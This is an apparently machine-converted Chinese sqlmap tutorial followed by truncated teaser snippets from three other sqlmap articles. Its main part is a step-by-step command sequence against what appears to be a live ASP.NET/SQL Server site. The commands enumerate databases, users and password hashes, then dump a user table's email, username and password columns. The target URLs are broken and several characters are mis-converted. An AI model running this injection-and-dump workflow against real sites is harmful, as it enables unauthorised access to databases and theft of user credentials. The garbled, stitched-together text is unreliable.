在sqlmap.py檔案下執行cmd:
引數:-u:指定注入點url; --batch 程式自動把所有需要輸入的y自動輸入
c:\python27\sqlmap>python sqlmap.py -u 「 --batch
例:注入結果展示:
(1)注入引數id為get注入,注入型別有四種分別為:boolean-based blind、error-based、stacked queries、inline query。
(2)web伺服器系統為windows 2003 or xp
(3)web應用程式技術為:asp.net, microsoft iis 6.0
(4)資料庫型別為:sqlserver 2000
c:\python27\sqlmap>python sqlmap.py -u 「 --dbs
c:\python27\sqlmap>python sqlmap.py -u 「 --current-db
c:\python27\sqlmap>python sqlmap.py -u 「 --current-user
c:\python27\sqlmap>python sqlmap.py -u 「 --users
c:\python27\sqlmap>python sqlmap.py -u 「 --passwords
c:\python27\sqlmap>python sqlmap.py -u "
cts.asp?id=134" -d tourdata --tables
c:\python27\sqlmap>python sqlmap.py -u 「 -d tourdata -t userb --columns
c:\python27\sqlmap>python sqlmap.py -u 「 -d tourdata -t userb -c 「email,username,userpassword」 --dump
c:\python27\sqlmap>python sqlmap.py -u 「 -d tourdata -t userb -c 「email,username,userpassword」 --start 1 --stop 10 --dump
sqlmap介紹與使用案例
1.sqlmap簡介 最白話的介紹就是sqlmap是乙個工具,乙個用來做sql注入攻擊的工具 3.2 解壓檔案 解壓到任意資料夾皆可 解壓以後大概是這個樣子的 之後就是要執行這個sqlmap.py的檔案 3.3 啟動乙個命令列,執行sqlmap.py 如果出現這個介面,表示一切正常 按任意鍵結束 4...
sqlmap簡單原理及使用
檢測注入 基本格式 sqlmap u 預設使用level1檢測全部資料庫型別 sqlmap u dbms mysql level 3 指定資料庫型別為mysql,級別為3 共5級,級別越高,檢測越全面 跟隨302跳轉 當注入頁面錯誤的時候,自動跳轉到另乙個頁面的時候需要跟隨302,當注入錯誤的時候,...
Sqlmap使用教程
sqlmap也是滲透中常用的乙個注入工具,其實在注入工具方面,乙個sqlmap就足夠用了,只要你用的熟,秒殺各種工具,只是乙個便捷性問題,sql注入另一方面就是手工黨了,這個就另當別論了。sqlmap支援五種不同的注入模式 mysql,oracle,postgresql,microsoft sql ...